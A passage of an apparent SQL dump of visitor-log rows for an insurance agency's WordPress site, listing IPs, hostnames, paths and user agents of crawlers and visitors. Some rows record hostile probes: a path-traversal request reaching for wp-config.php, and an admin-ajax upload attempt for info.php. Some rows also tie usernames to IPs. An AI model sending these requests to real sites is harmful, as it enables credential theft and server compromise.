MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8387,'0b_444ab639b7116ff72d54fb734b316c18','1458750997','62.210.143.245','mj8.naefmarco.ch','/SSO/235_19.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8388,'0b_444ab639b7116ff72d54fb734b316c18','1458751004','62.210.143.245','mj8.naefmarco.ch','/resources.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8391,'0b_444ab639b7116ff72d54fb734b316c18','1458751008','62.210.143.245','mj8.naefmarco.ch','/?p=283','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8393,'0b_444ab639b7116ff72d54fb734b316c18','1458751011','62.210.143.245','mj8.naefmarco.ch','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8394,'0b_e66578c9d4d458b594137e1cc596009d','1458753966','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(8397,'0b_e66578c9d4d458b594137e1cc596009d','1458753978','69.30.213.202','69.30.213.202','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(8399,'0b_e66578c9d4d458b594137e1cc596009d','1458753992','69.30.213.202','69.30.213.202','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(8400,'0b_e66578c9d4d458b594137e1cc596009d','1458754003','69.30.213.202','69.30.213.202','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(8402,'0b_066f4fa7b3cde1aa331bd91abb3f910c','1458755475','162.95.216.225','162.95.216.225','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8405,'0b_066f4fa7b3cde1aa331bd91abb3f910c','1458755500','162.95.216.225','162.95.216.225','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8408,'0b_c27268a1acf48e4ad371f874f8b500d3','1458756348','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(8411,'0b_c27268a1acf48e4ad371f874f8b500d3','1458756351','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(8412,'0b_8ea81f4787772c1a2caaec69ce55dce7','1458757747','91.210.145.130','130.145.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'WinXP','Firefox 16','ru','','','','','','','0','0',0),(8415,'0b_91916658f32d80dfca3812dc11128d16','1458757930','66.249.83.209,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(8418,'0b_d0ebf326f5e8a103f5effb1f3205cdbc','1458758250','52.0.3.61','ec2-52-0-3-61.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.','','',0,'WinVista','Firefox 3','ru','','','','','','','0','0',0),(8421,'0b_37e016d8c50347b37cae6dc64109b36a','1458759466','69.25.204.163','69.25.204.163','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwip09C3vtfLAhWIez4KHVdJCJIQ_BcIcjAL&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.117218890,d.cWw','',0,'Win7 x64','IE 7','us','1280 x 1024','','','','','','0','0',0),(8424,'0b_37e016d8c50347b37cae6dc64109b36a','1458759477','69.25.204.163','69.25.204.163','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)','http://www.empireins.com/','',0,'Win7 x64','IE 7','us','1280 x 1024','','','','','','0','0',0),(8427,'0b_37e016d8c50347b37cae6dc64109b36a','1458759509','69.25.204.163','69.25.204.163','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)','http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=12&ved=0ahUKEwiW4dHQvtfLAhWGGD4KHeiyDpQQ_BcIcjAL&url=http%3A%2F%2Fwww.empireins.com%2F&usg=AFQjCNEqpoINuZ9iLoJwjv1SXIp20w_BCg&bvm=bv.117218890,d.cWw','',0,'Win7 x64','IE 7','us','1280 x 1024','','','','','','0','0',0),(8429,'0b_37e016d8c50347b37cae6dc64109b36a','1458759520','69.25.204.163','69.25.204.163','/assets/js/google-code-prettify/prettify.css','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)','http://www.empireins.com/','',0,'Win7 x64','IE 7','us','1280 x 1024','','','','','','0','0',0),(8432,'0b_37e016d8c50347b37cae6dc64109b36a','1458759530','69.25.204.163','69.25.204.163','/contact/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)','http://www.empireins.com/','',0,'Win7 x64','IE 7','us','1280 x 1024','','','','','','0','51',0),(8435,'0b_d4115ce095e997ccf99480e4b02fa19d','1458760722','80.91.162.99','80.91.162.99','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(8438,'0b_d4115ce095e997ccf99480e4b02fa19d','1458760733','80.91.162.99','80.91.162.99','/companylinks.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(8441,'0b_0c9bbe00278d37ba5410c163b24361e8','1458761876','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8442,'0b_0c9bbe00278d37ba5410c163b24361e8','1458761877','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8445,'0b_9f6743f98b74080d667d1c716c1e3361','1458762381','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8448,'0b_9f6743f98b74080d667d1c716c1e3361','1458762383','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8451,'0b_24329d66fd00952dd9213bfbf2327b42','1458765012','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(8454,'0b_24329d66fd00952dd9213bfbf2327b42','1458765013','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(8457,'0b_24329d66fd00952dd9213bfbf2327b42','1458765018','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1920 x 1080','','','','','','0','0',0),(8459,'0b_1f083f39fe3fa5f1040dc6b3c44c11db','1458765055','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8460,'0b_223c84ee5586ef9cba6302e1d927c9ce','1458765066','65.123.142.178','65.123.142.178','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.6) Gecko/20070725 Firefox/2.0.0.6','','',0,'WinXP','Firefox 2','us','','','','','','','0','0',0),(8463,'0b_8b0ea694eda02aa41c183e6800927673','1458765840','209.140.40.130','ool-d18c2882.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(8465,'0b_88020671095913154b0906dd97d2d1e4','1458766478','72.69.72.12','static-72-69-72-12.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(8466,'0b_88020671095913154b0906dd97d2d1e4','1458766478','72.69.72.12','static-72-69-72-12.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(8468,'0b_88020671095913154b0906dd97d2d1e4','1458766481','72.69.72.12','static-72-69-72-12.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8471,'0b_7815d4b6914336aac053524c7ac49f3d','1458767921','209.234.193.210','209-234-193-210.static.twtelecom.net','/meet-the-eib-team/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(8472,'0b_6017ef414abc289f32700f96a6709d2e','1458770394','144.76.29.66','root.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8474,'0b_6017ef414abc289f32700f96a6709d2e','1458770397','144.76.29.66','root.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(8477,'0b_0bd7829ee574e5aec8005e79598651be','1458771310','66.87.116.27','66-87-116-27.pools.spcsdns.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 9_3 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13E234 Safari/601.1','http://www.empireins.com/','',0,'iPhone OS','Safari 9 Mobile','us','','','','','','','0','0',0),(8478,'0b_b56d44dd29f8714c85006da1c5120890','1458771999','80.255.192.237','80.255.192.237','/mdocs-posts/?mdocs-img-preview=../../../wp-config.php','Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; fr; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8','','',0,'MacOSX','Firefox 3','us','','','','','','','3','0',0),(8481,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772548','206.210.17.33','proxy3.newyorklife.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8483,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772549','206.210.17.33','proxy3.newyorklife.com','/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8486,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772549','206.210.17.33','proxy3.newyorklife.com','/home/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8489,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772550','206.210.17.33','proxy3.newyorklife.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8492,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772550','206.210.17.33','proxy3.newyorklife.com','/comments/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8495,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772556','206.210.17.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8496,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772557','206.210.17.33','proxy3.newyorklife.com','/agent-tools/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','0',0),(8498,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772557','206.210.17.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','','','0','51',0),(8499,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772567','206.210.17.33','proxy3.newyorklife.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','hermankatz','','0','51',0),(8501,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772580','206.210.17.33','proxy3.newyorklife.com','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','hermankatz','','0','51',0),(8502,'0b_c9e36f7e628f924c7ddea26dfc3e2b17','1458772580','206.210.17.33','proxy3.newyorklife.com','/forms/feed/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/forms/','',0,'Win7 x64','IE 11','us','1024 x 768','','','','hermankatz','','0','0',0),(8505,'0b_1fa92b145766d21deb2a4ae39afff896','1458776344','91.210.147.157','157.147.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ru','','','','','','','0','0',0),(8508,'0b_270a768018ca1378d6f2041ee4ab8dae','1458782882','66.249.66.154','crawl-66-249-66-154.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(8510,'0b_db43859decbdc137565ff0b915b14f0d','1458783936','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8511,'0b_db43859decbdc137565ff0b915b14f0d','1458783937','68.180.230.123','b115363.yse.yahoo.net','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8513,'0b_32ec0ed4ecc93f825c26202a6857e9ef','1458786537','66.249.66.150','crawl-66-249-66-150.googlebot.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(8516,'0b_2268c8bc2d34aebe615eb17b9b53122c','1458789088','68.180.230.123','b115363.yse.yahoo.net','/contact/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8517,'0b_9b1325c3a70f1e13ddd2a5997045493f','1458790230','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/robots.txt','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(8519,'0b_9b1325c3a70f1e13ddd2a5997045493f','1458790231','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','Unknown Spider','','','','3','0',0),(8520,'0b_9b1325c3a70f1e13ddd2a5997045493f','1458790233','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=info.php','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(8523,'0b_9b1325c3a70f1e13ddd2a5997045493f','1458790234','46.118.155.216','sol-fttb.216.155.118.46.sovam.net.ua','/','Mozilla/5.0 (Windows 10; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0','','',0,'Windows x64','Firefox 41','ua','','','','','','','3','0',0),(8525,'0b_56873232d7680fa4f522db149111d3ab','1458791671','66.249.66.187','crawl-66-249-66-187.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8528,'0b_a08d107f5a933f7a67c3efa221b99040','1458791672','66.249.66.184','crawl-66-249-66-184.googlebot.com','/','SAMSUNG-SGH-E250/1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 UP.Browser/6.2.3.3.c.1.101 (GUI) MMP/2.0 (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(8529,'0b_8836a3897f5c900f3ba1dde144f72623','1458793873','198.144.151.102','usernames.tnmail43.pw','/','Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)','','',0,'WinXP','IE 7','pw','','','','','','','0','0',0),(8531,'0b_6f0580545076fbfbefea022d6d509274','1458794776','66.249.66.187','crawl-66-249-66-187.googlebot.com','/','DoCoMo/2.0 N905i(c100;TB;W24H16) (compatible; Googlebot-Mobile/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot-Mobile','','','','0','0',0),(8534,'0b_61cfcec3e8ba91f9f878ccebbf3f965e','1458800641','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8537,'0b_7c8d5da10ab1605dcb76c1450ba80428','1458802187','45.79.89.188','li1188-188.members.linode.com','/robots.txt','Mozilla/5.0 (compatible; Uptimebot/1.0; +http://www.uptime.com/uptimebot)','','',0,'','','','','','Uptimebot','','','','0','0',0),(8538,'0b_b77db32ba00b9df5f4f423987d128919','1458804855','66.249.66.150','crawl-66-249-66-150.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(8540,'0b_6300ffc78fd1288382b962816c49a32d','1458807079','104.197.112.194','194.112.197.104.bc.googleusercontent.com','[404] /apple-touch-icon.png','Java/1.7.0_75','','',0,'','','','','','Java','','','','0','0',0),(8541,'0b_6300ffc78fd1288382b962816c49a32d','1458807080','104.197.112.194','194.112.197.104.bc.googleusercontent.com','/','Java/1.7.0_75','','',0,'','','','','','Java','','','','0','0',0),(8543,'0b_4e5a3e7092e627add4120de6723a1f72','1458807218','64.237.57.75','64.237.57.75.choopa.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 5.1; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'WinXP','Firefox 15','ua','','','','','','','0','0',0),(8546,'0b_b2cddbbe5407c4b183a03d81bb5fec65','1458808155','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(8549,'0b_6345b1715bde63b025ed79e5414140f3','1458810788','157.55.39.228','msnbot-157-55-39-228.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8550,'0b_2085d95d6ddaab106b45e1196259329a','1458810972','64.237.57.75','64.237.57.75.choopa.com','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:16.0.1) Gecko/20121011 Firefox/16.0.1','','',0,'Win7','Firefox 16','ua','','','','','','','0','0',0),(8553,'0b_d78483ddc2f41b7d7f88ce4658df601a','1458813328','180.76.15.158','baiduspider-180-76-15-158.crawl.baidu.com','/forms/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(8556,'0b_2cf07f1a6dc41e2967624e0e6e549b56','1458816316','40.77.167.44','msnbot-40-77-167-44.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8558,'0b_aacc97a83a8438a98fccdd822d4ed7d8','1458817757','68.180.230.123','b115363.yse.yahoo.net','/robots.txt','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8561,'0b_aacc97a83a8438a98fccdd822d4ed7d8','1458817758','68.180.230.123','b115363.yse.yahoo.net','/about-us/','Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)','','',0,'','','','','','Yahoo! Slurp','','','','0','0',0),(8562,'0b_262413dd735a9df901edab729976ffcf','1458817830','94.23.19.178','netherfield.didici.be','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(8564,'0b_262413dd735a9df901edab729976ffcf','1458817833','94.23.19.178','netherfield.didici.be','/?p=288','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(8565,'0b_262413dd735a9df901edab729976ffcf','1458817835','94.23.19.178','netherfield.didici.be','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','be','','','MJ12bot','','','','0','0',0),(8568,'0b_322dd36528ebb91d92c61d92648bb357','1458818907','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8570,'0b_b62202e42edb6b1ee2878b3906edb81d','1458820165','207.46.13.26','msnbot-207-46-13-26.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(8571,'0b_34b44635ea7bf1f4bbaeedaab0050b8f','1458820169','157.55.12.73','157.55.12.73','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534+ (KHTML, like Gecko) BingPreview/1.0b','http://www.empireins.com/','',0,'Win7','BingPreview 1','','','','','','','','0','0',0),(8573,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823025','51.255.162.165','165.ip-51-255-162.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8574,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823027','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8576,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823029','51.255.162.165','165.ip-51-255-162.eu','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8577,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823032','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_18.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8580,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823034','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_39.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','eu','','','MJ12bot','','','','0','0',0),(8582,'0b_667fd3cb2ef003175e0aeed6d3b50894','1458823040','51.255.162.165','165.ip-51-255-162.eu','/SSO/235_42.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; 